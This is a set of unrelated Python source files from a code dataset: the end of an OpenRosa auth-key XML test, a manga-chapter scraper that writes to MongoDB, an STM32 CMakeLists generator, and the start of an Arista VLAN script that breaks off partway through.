<key type="{record.type}">{record.key}</key>
</key_record>
</auth_keys>
</OpenRosaResponse>
""".format(
now=self.format_datetime_no_usec(self.now),
now_plus_30=self.format_datetime_no_usec(now_plus_30),
record=record,
domain=self.domain_name,
))
record = new_key_record(None, None, now=self.now, valid=now_minus_30)
xml = get_mobile_auth_payload([record], self.domain_name, now=self.now)
check_xml_line_by_line(self, xml, """
<OpenRosaResponse xmlns="http://openrosa.org/http/response">
<message nature="submit_success">Here are your keys!</message>
<auth_keys domain="{domain}" issued="{now}">
<key_record valid="{now_minus_30}" expires="{now_plus_30}">
<uuid>{record.uuid}</uuid>
<key type="{record.type}">{record.key}</key>
</key_record>
</auth_keys>
</OpenRosaResponse>
""".format(
now=self.format_datetime_no_usec(self.now),
now_plus_30=self.format_datetime_no_usec(now_plus_30),
now_minus_30=self.format_datetime_no_usec(now_minus_30),
record=record,
domain=self.domain_name,
))
|
the-stack_106_12920
|
#####################################################################
# All rights reserved to davekolian #
#####################################################################
import pymongo
from lxml import html
import requests
import time
# from requests_html import AsyncHTMLSession
import datetime
import sys
from configparser import ConfigParser
import asyncio
import nest_asyncio
nest_asyncio.apply()
lst_not_read_dicts = []
not_read = []
document_count = 1
# Functions which scrape the websites to find which chapters have been newly released
async def find_manga_mangakakalot(url):
await asyncio.sleep(1)
global not_read
global document_count
global error_urls
page = requests.get(url)
tree = html.fromstring(page.content)
manga = tree.xpath('//ul[@class="manga-info-text"]/li/h1/text()')
chap = tree.xpath('//div[@class="row"]/span/a/text()')
times = tree.xpath('//div[@class="row"]/span/text()')
imgs_srcs = tree.xpath('//div[@class="manga-info-pic"]/img/@src')
links = tree.xpath('//div[@class="row"]/span/a/@href')
if page.status_code == 200 and manga:
times = [times[i] for i in range(1, len(times), 2)]
# Cleaning the manga's name
manga_clean = str(manga)[2:-2]
if " " not in manga_clean:
manga_clean += " "
chap_clean = []
# Gets the exact Chapter number
for x in range(0, len(chap)):
start_chapter = chap[x].find("Chapter")
if ":" in chap[x]:
end_line = chap[x].find(":")
chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
else:
chap_clean.append(str(chap[x][start_chapter + 8:]))
# Adding the required manga name and index num into the not_read array
for x in range(0, len(times)):
if "day" in times[x] or "days" in times[x]:
if int(str(times[x][0:1])) < 2:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "hour" in times[x] or "hours" in times[x]:
if int(str(times[x][0:2])) < 24:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "mins" in times[x] or "min" in times[x] or "minutes" in times[x] or "minute" in times[x]:
if int(str(times[x][0:1])) < 60:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
# Adding the required chapters and their links into array form for MongoDB
list_of_chaps = []
list_of_chap_links = []
for x in range(0, len(times)):
if "day" in times[x] or "days" in times[x]:
if int(str(times[x][0:1])) < 2:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "hour" in times[x] or "hours" in times[x]:
if int(str(times[x][0:2])) < 24:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "mins" in times[x] or "min" in times[x] or "minutes" in times[x] or "minute" in times[x]:
if int(str(times[x][0:1])) < 60:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
if list_of_chaps:
not_read.extend([list_of_chaps, list_of_chap_links])
# Appending the new chapters into the dictionary
if not_read:
new_document = {
'record_id': not_read[1],
'manga_name': not_read[2],
'manga_chapters': not_read[3],
'img_link_bg': imgs_srcs[0],
'chapter_links': not_read[4]
}
lst_not_read_dicts.append(new_document)
not_read = []
async def find_manga_manganelo(url):
await asyncio.sleep(1)
global not_read
global document_count
global error_urls
page = requests.get(url)
tree = html.fromstring(page.content)
manga = tree.xpath('//div[@class="story-info-right"]/h1//text()')
chap = tree.xpath('//a[@class="chapter-name text-nowrap"]/text()')
dates = tree.xpath('//span[@class="chapter-time text-nowrap"]/text()')
imgs_srcs = tree.xpath('//span[@class="info-image"]/img/@src')
links = tree.xpath('//a[@class="chapter-name text-nowrap"]/@href')
if page.status_code == 200 and manga:
# Cleaning the manga's name
manga_clean = str(manga)[2:-2]
if " " not in manga_clean:
manga_clean += " "
chap_clean = []
# Removing the 'Chapter' word and getting the chapter number
for x in range(0, len(chap)):
if "Chapter" in chap[x]:
start_chapter = chap[x].find("Chapter")
if ":" in chap[x]:
end_line = chap[x].find(":")
chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
elif " -" in chap[x]:
end_line = chap[x].find(" -")
chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
else:
chap_clean.append(str(chap[x][start_chapter + 8:]))
else:
chap_clean.append("SC")
# Adding the required manga name and index num into the not_read array
for x in range(0, len(dates)):
if "day" in dates[x] or "days" in dates[x]:
if int(str(dates[x][0:1])) < 2:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "hour" in dates[x] or "hours" in dates[x]:
if int(str(dates[x][0:2])) < 24:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
if int(str(dates[x][0:1])) < 60:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
# Adding the required chapters and their links into array form for MongoDB
list_of_chaps = []
list_of_chap_links = []
for x in range(0, len(dates)):
if "day" in dates[x] or "days" in dates[x]:
if int(str(dates[x][0:1])) < 2:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "hour" in dates[x] or "hours" in dates[x]:
if int(str(dates[x][0:2])) < 24:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
if int(str(dates[x][0:2])) < 60:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
if list_of_chaps:
not_read.extend([list_of_chaps, list_of_chap_links])
# Appending the new chapters into the dictionary
if not_read:
new_document = {
'record_id': not_read[1],
'manga_name': not_read[2],
'manga_chapters': not_read[3],
'img_link_bg': imgs_srcs[0],
'chapter_links': not_read[4]
}
lst_not_read_dicts.append(new_document)
not_read = []
# async def find_manga_reaperzero(url):
# await asyncio.sleep(1)
# global not_read
# global document_count
# global error_urls
#
# page = requests.get(url)
# tree = html.fromstring(page.content)
#
# manga = tree.xpath('//h5[@class="text-highlight"]/text()')
# chap = tree.xpath('//span[@class="text-muted text-sm"]/text()')
# dates = tree.xpath('//a[@class="item-company text-muted h-1x"]/text()')
# imgs_srcs = tree.xpath('//a[@class="media-content"]/@style')
# links = tree.xpath('//a[@class="item-author text-color "]/@href')
#
# if page.status_code == 200 and manga:
# # Preparing image links to upload to DB
# if "reaper" in url:
# if "reaperscans.com" in str(imgs_srcs[0]):
# imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "")
# else:
# imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "https://reaperscans.com")
# imgs_srcs = imgs_srcs.replace(")", "")
# # else:
# # if "zeroscans.com" in str(imgs_srcs[0]):
# # imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "")
# # else:
# # imgs_srcs = str(imgs_srcs[0]).replace("background-image:url(", "https://zeroscans.com")
# # imgs_srcs = imgs_srcs.replace(")", "")
#
# # Cleaning the manga's name
# manga_clean = str(manga)[4:-4]
#
# if " " not in manga_clean:
# manga_clean += " "
#
# # Adding 'Chapter ' infront of the chapter numbers for method to get the numbers accurately (improv)
# for x in range(0, len(chap)):
# chap[x] = "Chapter " + str(chap[x]).replace("\n", "")
#
# # Removing the 'Chapter' word and getting the chapter number
# chap_clean = []
#
# for x in range(0, len(chap)):
# start_chapter = chap[x].find("Chapter")
# if ":" in chap[x]:
# end_line = chap[x].find(":")
# chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
# else:
# chap_clean.append(str(chap[x][start_chapter + 8:]))
#
# if " " in chap_clean[x]:
# chap_clean[x] = chap_clean[x].replace(" ", "")
#
# # Adding the required manga name and index num into the not_read array
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][1:2])) < 2:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][1:2])) < 24:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:2])) < 60:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
#
# # Adding the required chapters and their links into array form for MongoDB
# list_of_chaps = []
# list_of_chap_links = []
#
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][1:2])) < 2:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][1:2])) < 24:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:2])) < 60:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
#
# if list_of_chaps:
# not_read.extend([list_of_chaps, list_of_chap_links])
#
# # Appending the new chapters into the dictionary
# if not_read:
# new_document = {
# 'record_id': not_read[1],
# 'manga_name': not_read[2],
# 'manga_chapters': not_read[3],
# 'img_link_bg': imgs_srcs,
# 'chapter_links': not_read[4]
# }
#
# lst_not_read_dicts.append(new_document)
#
# not_read = []
# async def find_manga_mangaplus(url):
# global not_read
# global document_count
#
# session = AsyncHTMLSession()
# r = await session.get(url)
# manga = r.html.xpath('//div[@class="post-title"]/h1/text()')
# if r.status_code == 200 and manga:
# await r.html.arender(timeout=7000)
#
# chap = r.html.xpath('//li[@class="wp-manga-chapter"]/a/text()')
# dates = r.html.xpath('//span[@class="chapter-release-date"]/i/text()')
# imgs_srcs = r.html.xpath('//div[@class="summary_image"]/a/img/@data-src')
# links = r.html.xpath('//li[@class="wp-manga-chapter"]/a/@href')
#
# if len(manga) >= 2:
# manga_clean = str(manga[1])[7:-20]
# else:
# manga_clean = str(manga)[30:-22]
# # Done just for Lit The Supreme Being which was buggy
#
# # Cleaning the manga's name
# if " " not in manga_clean:
# manga_clean += " "
#
# # Removing the 'Chapter' word and getting the chapter number
# chap_clean = []
#
# for x in range(0, len(chap)):
# chap[x] = str(chap[x])[10:-8]
# start_chapter = chap[x].find("Chapter")
# if ":" in chap[x]:
# end_line = chap[x].find(":")
# chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
# elif " -" in chap[x]:
# end_line = chap[x].find(" -")
# chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
# else:
# chap_clean.append(str(chap[x][start_chapter + 8:]))
#
# # Adding the required manga name and index num into the not_read array
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][0:1])) < 2:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][0:2])) < 24:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:1])) < 60:
# not_read.append("s")
# not_read.append(document_count)
# document_count += 1
# not_read.append(manga_clean)
# break
#
# # Adding the required chapters and their links into array form for MongoDB
# list_of_chaps = []
# list_of_chap_links = []
#
# for x in range(0, len(dates)):
# if "day" in dates[x] or "days" in dates[x]:
# if int(str(dates[x][0:1])) < 2:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "hour" in dates[x] or "hours" in dates[x]:
# if int(str(dates[x][0:2])) < 24:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
# elif "mins" in dates[x] or "min" in dates[x] or "minutes" in dates[x] or "minute" in dates[x]:
# if int(str(dates[x][0:2])) < 60:
# list_of_chaps.append(chap_clean[x])
# list_of_chap_links.append(links[x])
#
# if list_of_chaps:
# not_read.extend([list_of_chaps, list_of_chap_links])
#
# # Appending the new chapters into the dictionary
# if not_read:
# new_document = {
# 'record_id': not_read[1],
# 'manga_name': not_read[2],
# 'manga_chapters': not_read[3],
# 'img_link_bg': imgs_srcs[0],
# 'chapter_links': not_read[4]
# }
#
# lst_not_read_dicts.append(new_document)
#
# not_read = []
# await session.close()
# Function which connects to my database, clears the collection, and updates with new list of of documents
def clear_and_update_database():
# Setting up Config Parser for more security, thanks to @bugnounty
conf_parser = ConfigParser()
conf_parser.read('db_config.ini')
connection_url = conf_parser.get('server', 'connection_url')
db_name = conf_parser.get('server', 'db_name')
col_name = conf_parser.get('server', 'col_name')
# Connect to the MongoDB Database
client = pymongo.MongoClient(connection_url)
my_database = client.get_database(db_name)
my_collection = my_database.get_collection(col_name)
# Clears the Collection
my_collection.delete_many({})
# Inserts many documents (containing new manga releases)
my_collection.insert_many(lst_not_read_dicts)
# Close the connection to the database
client.close()
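# Illustrative sketch (not part of the original script): clear_and_update_database() expects
# a db_config.ini next to the script with a single [server] section; the values below are
# placeholders (db/collection names taken from the notes at the bottom of this file).
#
#   [server]
#   connection_url = mongodb+srv://<user>:<password>@<cluster>/?retryWrites=true
#   db_name = manga_app
#   col_name = manga_app_records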
async def main_manga():
# tasks_mp = []
# url_list = ['https://manhuaplus.com/manga/almighty-master/', 'https://manhuaplus.com/manga/global-martial-arts/',
# 'https://manhuaplus.com/manga/the-great-ruler/', 'https://manhuaplus.com/manga/the-strongest-god-king/',
# 'https://manhuaplus.com/manga/rebirth-of-the-urban-immortal-cultivator/',
# 'https://manhuaplus.com/manga/demon-magic-emperor/', 'https://manhuaplus.com/manga/apotheosis/',
# 'https://manhuaplus.com/manga/battle-through-the-heavens/',
# 'https://manhuaplus.com/manga/peerless-battle-spirit/', 'https://manhuaplus.com/manga/versatile-mage/',
# 'https://manhuaplus.com/manga/tales-of-demons-and-gods/',
# 'https://manhuaplus.com/manga/lit-the-supreme-being/',
# 'https://manhuaplus.com/manga/rebirth-city-deity/']
#
# for link in url_list:
# tasks_mp.append(asyncio.create_task(find_manga_mangaplus(link)))
#
# await asyncio.gather(*tasks_mp)
# url_list = ['https://reaperscans.com/comics/27937-god-of-blackfield',
# 'https://reaperscans.com/comics/316621-the-great-mage-returns-after-4000-years',
# 'https://reaperscans.com/comics/917294-kill-the-hero',
# 'https://reaperscans.com/comics/563929-limit-breaker',
# 'https://reaperscans.com/comics/535459-mercenary-enrollment',
# 'https://reaperscans.com/comics/335355-sss-class-suicide-hunter',
# 'https://reaperscans.com/comics/147221-superhuman-era',
# 'https://reaperscans.com/comics/364640-the-tutorial-is-too-hard',
# 'https://reaperscans.com/comics/326450-the-player-that-cant-level-up',
# 'https://reaperscans.com/comics/276469-strongest-fighter',
# 'https://reaperscans.com/comics/507776-return-of-the-frozen-player',
# 'https://reaperscans.com/comics/585562-arcane-sniper',
# 'https://zeroscans.com/comics/55416-record-of-the-war-god',
# 'https://zeroscans.com/comics/133460-yong-heng-zhi-zun',
# 'https://zeroscans.com/comics/325051-bowblade-spirit',
# 'https://zeroscans.com/comics/188504-second-life-ranker',
# 'https://zeroscans.com/comics/21941-taming-master',
# 'https://zeroscans.com/comics/585998-the-undefeatable-swordsman']
#
# # Reaper Scans | Zero Scans
# for link in url_list:
# tasks_mp.append(asyncio.create_task(find_manga_reaperzero(link)))
tasks_mp = []
# Mangakakalot
url_list = ['https://mangakakalot.com/read-lm7ib158504847850', 'https://mangakakalot.com/read-ox3yk158504833790',
'https://mangakakalot.com/read-zs6sp158504840280', 'https://mangakakalot.com/read-ul6pf158504868718',
'https://mangakakalot.com/read-ep8pm158504835723', 'https://mangakakalot.com/read-ro4rv158504853379',
'https://mangakakalot.com/read-ja7yn158504838124', 'https://mangakakalot.com/read-jc2wf158504842343',
'https://mangakakalot.com/read-rp1kv158504840628', 'https://mangakakalot.com/read-ie2ho158504839970',
'https://mangakakalot.com/read-wx1xd158504840874', 'https://mangakakalot.com/read-od1pe158504845657',
'https://mangakakalot.com/read-ol2fi158504849602', 'https://mangakakalot.com/manga/lo924793',
'https://mangakakalot.com/read-sz0gg158504854945', 'https://mangakakalot.com/read-dl7bc158504854888',
'https://mangakakalot.com/read-yv2vd158504858458', 'https://mangakakalot.com/read-fv5mg158504856152',
'https://mangakakalot.com/read-ts3gp158504833220', 'https://mangakakalot.com/read-ny9yj158504835342',
'https://mangakakalot.com/read-zg1oh158504842553', 'https://mangakakalot.com/read-vg0sa158504844980',
'https://mangakakalot.com/read-gj8eg158504836414', 'https://mangakakalot.com/read-of6id158504884374',
'https://mangakakalot.com/read-jb3vb158504854796', 'https://mangakakalot.com/read-jm4cz158504894339',
'https://mangakakalot.com/read-tv7mr158504845382', 'https://mangakakalot.com/read-cq3sf158504857171',
'https://mangakakalot.com/read-oe6uc158504836571', 'https://mangakakalot.com/read-mo5of158504931270',
'https://mangakakalot.com/read-kh6ab158504854282', 'https://mangakakalot.com/read-rc4ti158504848110',
'https://mangakakalot.com/read-iq9la158504835986', 'https://mangakakalot.com/manga/dy925897',
'https://mangakakalot.com/manga/xo924628', 'https://mangakakalot.com/manga/eo924794',
'https://mangakakalot.com/manga/yl923871', 'https://mangakakalot.com/manga/vi924713',
'https://mangakakalot.com/read-iw9rf158504883256', 'https://mangakakalot.com/read-bo1jc158504861718',
'https://mangakakalot.com/manga/py923734', 'https://mangakakalot.com/manga/ni924461',
'https://mangakakalot.com/manga/xl923012', 'https://mangakakalot.com/read-ts7tt158504943623',
'https://mangakakalot.com/manga/jv925863', 'https://mangakakalot.com/read-fq9iu158504944929',
'https://mangakakalot.com/manga/xv925862', 'https://mangakakalot.com/manga/cc925283',
'https://mangakakalot.com/manga/sw922557', 'https://mangakakalot.com/read-xf9fk158504906020',
'https://mangakakalot.com/read-nz2fb158504821825', 'https://mangakakalot.com/read-rl4cd158504850497',
'https://mangakakalot.com/manga/gi925311', 'https://mangakakalot.com/manga/vf922819',
'https://mangakakalot.com/manga/ks924647', 'https://mangakakalot.com/manga/ph925967',
'https://mangakakalot.com/manga/wb925651', 'https://mangakakalot.com/manga/yx924697']
for link in url_list:
tasks_mp.append(asyncio.create_task(find_manga_mangakakalot(link)))
# Manganelo
url_list = ['https://manganelo.com/manga/xn921310', 'https://manganelo.com/manga/huku267071576897767',
'https://manganelo.com/manga/read_boku_no_hero_academia_manga',
'https://manganelo.com/manga/read_one_punch_man_manga_online_free3',
'https://manganelo.com/manga/black_clover', 'https://manganelo.com/manga/uaxz925974686',
'https://manganelo.com/manga/dnha19771568647794', 'https://manganelo.com/manga/doulou_dalu_manga',
'https://manganelo.com/manga/pn918005', 'https://manganelo.com/manga/ad921253',
'https://manganelo.com/manga/wu_dong_qian_kun', 'https://manganelo.com/manga/jm923526',
'https://manganelo.com/manga/the_wrong_way_to_use_healing_magic',
'https://manganelo.com/manga/lv999_no_murabito', 'https://manganelo.com/manga/tn922327',
'https://manganelo.com/manga/ff919945', 'https://manganelo.com/manga/bl921472',
'https://manganelo.com/manga/legend_of_phoenix', 'https://manganelo.com/manga/spirit_sword_sovereign',
'https://manganelo.com/manga/mushoku_tensei_isekai_ittara_honki_dasu',
'https://manganelo.com/manga/the_legendary_moonlight_sculptor', 'https://manganelo.com/manga/tn921283',
'https://manganelo.com/manga/ijhr296321559609648', 'https://manganelo.com/manga/si923815',
'https://manganelo.com/manga/the_magic_chef_of_ice_and_fire', 'https://manganelo.com/manga/eg919734',
'https://manganelo.com/manga/bb922866', 'https://manganelo.com/manga/pe922745',
'https://manganelo.com/manga/yrlq217991556843654', 'https://manganelo.com/manga/aq920543',
'https://manganelo.com/manga/be922652', 'https://manganelo.com/manga/ra921707',
'https://manganelo.com/manga/ix921032', 'https://manganelo.com/manga/ir920623',
'https://manganelo.com/manga/fk918347', 'https://manganelo.com/manga/zu917722',
'https://manganelo.com/manga/sm917699', 'https://manganelo.com/manga/wo923110',
'https://manganelo.com/manga/rj922755', 'https://manganelo.com/manga/tv922828',
'https://manganelo.com/manga/pd924480', 'https://manganelo.com/manga/martial_peak',
'https://manganelo.com/manga/do918903', 'https://manganelo.com/manga/nidoume_no_jinsei_wo_isekai_de',
'https://manganelo.com/manga/ku920038', 'https://manganelo.com/manga/mq918999',
'https://manganelo.com/manga/lj919175', 'https://manganelo.com/manga/dr_frost',
'https://manganelo.com/manga/gz922893', 'https://manganelo.com/manga/shikkaku_mon_no_saikyou_kenja',
'https://manganelo.com/manga/the_other_world_doesnt_stand_a_chance_against_the_power_of_instant_death',
'https://manganelo.com/manga/tensei_kenja_no_isekai_raifu_daini_no_shokugyo_wo_ete_sekai_saikyou_ni_narimashita',
'https://manganelo.com/manga/ec925329', 'https://manganelo.com/manga/read_doupo_cangqiong_manga',
'https://manganelo.com/manga/pg920736', 'https://manganelo.com/manga/the_great_ruler',
'https://manganelo.com/manga/rx922672', 'https://manganelo.com/manga/vrin278571580265812',
'https://manganelo.com/manga/apotheosis', 'https://manganelo.com/manga/kk921357',
'https://manganelo.com/manga/hyer5231574354229', 'https://manganelo.com/manga/sw923218',
'https://manganelo.com/manga/rx919523', 'https://manganelo.com/manga/uw924618',
'https://manganelo.com/manga/dz919342', 'https://manganelo.com/manga/pe922986',
'https://manganelo.com/manga/pb925700', 'https://manganelo.com/manga/zm924455',
'https://manganelo.com/manga/yong_heng_zhi_zun', 'https://manganelo.com/manga/kg923596',
'https://manganelo.com/manga/jx925356', 'https://manganelo.com/manga/jf921342',
'https://manganelo.com/manga/lg924896', 'https://manganelo.com/manga/fe922634',
'https://manganelo.com/manga/qp925636', 'https://manganelo.com/manga/dq922693',
'https://manganelo.com/manga/rm922554', 'https://manganelo.com/manga/go922760',
'https://manganelo.com/manga/ph925080', 'https://manganelo.com/manga/kj923068',
'https://manganelo.com/manga/rf925407', 'https://manganelo.com/manga/jb924592',
'https://manganelo.com/manga/iu923224', 'https://manganelo.com/manga/ks924647']
for link in url_list:
tasks_mp.append(asyncio.create_task(find_manga_manganelo(link)))
await asyncio.gather(*tasks_mp)
# Main core of the loop to make the program run every x mins
if __name__ == "__main__":
while True:
document_count = 1
try:
# Creating a File Log System
current_time = str(datetime.datetime.now())
output_console = "[" + current_time + "] " + "Starting the search for mangas!\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
asyncio.run(main_manga())
# print(lst_not_read_dicts)
current_time = str(datetime.datetime.now())
output_console = "[" + str(current_time) + "] " + str(lst_not_read_dicts) + "\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
clear_and_update_database()
except Exception as ex:
exception_type, exception_object, exception_traceback = sys.exc_info()
line_no = exception_traceback.tb_lineno
# Adding (an) exception(s) on the log file
current_time = str(datetime.datetime.now())
output_console = "[" + current_time + "] " + "Exception has occured: " + str(line_no) + " - " + str(
ex.args) + " !\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
# time.sleep(5 * 60)
finally:
# Clears the list for next iteration
lst_not_read_dicts = []
# Make the app sleep for x mins before restarting
time.sleep(10 * 60)
# Adding when the sleep timer is over
current_time = str(datetime.datetime.now())
output_console = "[" + current_time + "] " + "Restarting the loop!\n"
log = open("log.txt", "a")
log.write(output_console)
log.close()
# Bugs:
# ZeroScans has some problem with the pictures
# ReaperScans has a method to avoid the bot
# ManhuaPlus needs JS loading which causes my instance to crash
#######################################################
# Learning #
#######################################################
# MongoDB stuff:
# import pymongo
# client = pymongo.MongoClient("connection_url")
# db = client.get_database('manga_app')
# table = db.get_collection("manga_app_records")
# collection -> table
# document -> rows
# table.delete_many({})
# print(table.count_documents({}))
# insert a document i.e row insert_one() or insert_many()
# new_row = {
# 'record_id': 3,
# 'manga_name': 'dummy name',
# 'manga_chapters': ['c1', 'c2'],
# 'img_link_bg': 'dummy_link',
# 'chapter_links': ['link1', 'link2']
# }
# table.insert_one(new_row)
# find a document, find() -> returns an iterator, find_one({'keyword': search})
# print(list(table.find({})))
# update, update_one(filter_dict, {'$set': new_dict}) or update_many
# delete, delete_one(filter_dict) or delete_many(filter_dict)
# print(list(table.find({'manga_name': 'dummy name'})))
# table.delete_many({'manga_name': 'dummy name'})
|
the-stack_106_12921
|
from collections import defaultdict
import fnmatch
import logging
import os
from os.path import join, abspath, isfile, dirname, basename
from ._utils import get_template_environment
logger = logging.getLogger(__name__)
class CMakeGenerator:
"""
    CMakeLists.txt generator for an STM32 CubeMX project with a Makefile.
"""
_GLOB_SOURCES = {'*.c', '*.cpp'}
_REMOVE_GLOB_SOURCES = {'*_template.*'}
_STM_HAL_DRIVER = 'Drivers/STM32*HAL*/Src'
def _process_source_files(self, project_dir, sources):
# split sources by directories
source_dirs = defaultdict(lambda: set())
for source in sources:
source_path = abspath(join(project_dir, source))
if not isfile(source_path):
raise ValueError("Source must contain only files, but it contains {}".format(source))
source_dir = dirname(source)
source_basename = basename(source)
source_dirs[source_dir].add(source_basename)
# try to add some optimization for source directories
optimized_source_dirs = {}
for source_dir, source_files in source_dirs.items():
source_dir_path = join(project_dir, source_dir)
dir_files = {dir_file for dir_file in os.listdir(source_dir_path)
if isfile(join(source_dir_path, dir_file))}
glob_files = {
dir_file for dir_file in dir_files
if any(fnmatch.fnmatch(dir_file, glob_template)
for glob_template in self._GLOB_SOURCES)
}
if glob_files and glob_files.issubset(source_files):
source_info = {
'files': source_files - glob_files,
'globs': self._GLOB_SOURCES
}
else:
source_info = {'files': source_files}
optimized_source_dirs[source_dir] = source_info
# special case for 'Src' directory
optimized_source_dirs['Src'] = {'globs': self._GLOB_SOURCES}
# special case for HAL driver
for source_dir, source_info in optimized_source_dirs.items():
if fnmatch.fnmatch(source_dir, self._STM_HAL_DRIVER):
source_info.pop('files', None)
source_info['globs'] = self._GLOB_SOURCES
source_info['remove_files'] = {
hal_file for hal_file in os.listdir(join(project_dir, source_dir))
if any(fnmatch.fnmatch(hal_file, glob_template)
for glob_template in self._REMOVE_GLOB_SOURCES)
}
break
# split optimized_source_dirs into 3 category
globs = []
remove_files = []
files = []
for source_dir in sorted(optimized_source_dirs):
source_info = optimized_source_dirs[source_dir]
for source_glob in source_info.get('globs', set()):
globs.append('{}/{}'.format(source_dir, source_glob).lstrip('/'))
for source_file in source_info.get('files', set()):
files.append('{}/{}'.format(source_dir, source_file).lstrip('/'))
for source_remove_file in source_info.get('remove_files', set()):
remove_files.append('{}/{}'.format(source_dir, source_remove_file).lstrip('/'))
return globs, remove_files, files
def generate_from_make(self, project_description, cmake_file):
# optimize source file location
source_globs, source_remove_files, source_files = self._process_source_files(
project_dir=project_description.project_dir,
sources=project_description.source_files
)
# render cmakefile
env = get_template_environment()
cmake_template = env.get_template('CmakeLists.txt')
cmake_context = {
'cmake_version': '3.5',
'project': {
'name': project_description.target,
'include_dirs': project_description.include_dirs,
'source': {
'globs': source_globs,
'remove_files': source_remove_files,
'files': source_files
},
'build_dir': project_description.build_dir,
'definitions': project_description.definitions,
'mcu_flags': project_description.mcu_flags,
'optimization_flags': project_description.optimization_flags,
'ld_script': project_description.ld_script
}
}
cmake_file_content = cmake_template.render(cmake_context)
# save cmakefile
with open(cmake_file, 'w', encoding='utf-8') as f:
f.write(cmake_file_content)
def generate_cmake_from_make(project_description, cmake_file):
"""
Generate cmake file.
:param project_description: :class:`ProjectDescription` object
:param cmake_file: cmake file path
"""
CMakeGenerator().generate_from_make(project_description, cmake_file)
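# Illustrative sketch (not part of the original module): a typical call site, assuming a
# ProjectDescription has been parsed from the CubeMX Makefile elsewhere in the package;
# parse_makefile() below is a hypothetical helper, and the attribute names mirror the
# ones read in generate_from_make() above.
#
#   description = parse_makefile('path/to/cubemx/project')
#   generate_cmake_from_make(description, 'path/to/cubemx/project/CMakeLists.txt')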
|
the-stack_106_12923
|
#!/usr/bin/env python
"""
Using Arista's pyeapi, create a script that allows you to add a VLAN (both the
VLAN ID and the VLAN name). Your script should first check that the VLAN ID is
available and only add the VLAN if it doesn't already exist. Use VLAN IDs
between 100 and 999. You should be able to call the script from the command
line as follows:
python eapi_vlan.py --name blue 100 # add VLAN100, name blue
If you call the script with the --remove option, the VLAN will be removed.
python eapi_vlan.py --remove 100 # remove VLAN100
Once again only remove the VLAN if it exists on the switch. You will probably
want to use Python's argparse to accomplish the argument processing.
"""
from __future__ import unicode_literals, print_function
import pyeapi
import argparse
import six
def pyeapi_result(output):
"""Return the 'result' value from the pyeapi output."""
return output[0]['result']
def check_vlan_exists(eapi_conn, vlan_id):
"""
Check if the given VLAN exists
Return either vlan_name or False
"""
vlan_id = six.text_type(vlan_id)
cmd = 'show vlan id {}'.format(vlan_id)
try:
response = eapi_conn.enable(cmd)
check_vlan = pyeapi_result(response)['vlans']
return check_vlan[vlan_id]['name']
except (pyeapi.eapilib.CommandError, KeyError):
pass
return False
def configure_vlan(eapi_conn, vlan_id, vlan_name=None):
"""
Add the given vlan_id to the switch
Set the vlan_name (if provided)
Note, if the vlan already exists, then this will just set the vlan_name
"""
command_str1 = 'vlan {}'.format(vlan_id)
cmd = [command_str1]
if vlan_name is not None:
command_str2 = 'name {}'.format(vlan_name)
cmd.append(command_str2)
return eapi_conn.config(cmd)
def main():
"""Add/remove vlans from Arista switch in an idempotent manner."""
eapi_conn = pyeapi.connect_to("pynet-sw2")
# Argument parsing
parser = argparse.ArgumentParser(
description="Idempotent addition/removal of VLAN to Arista switch"
)
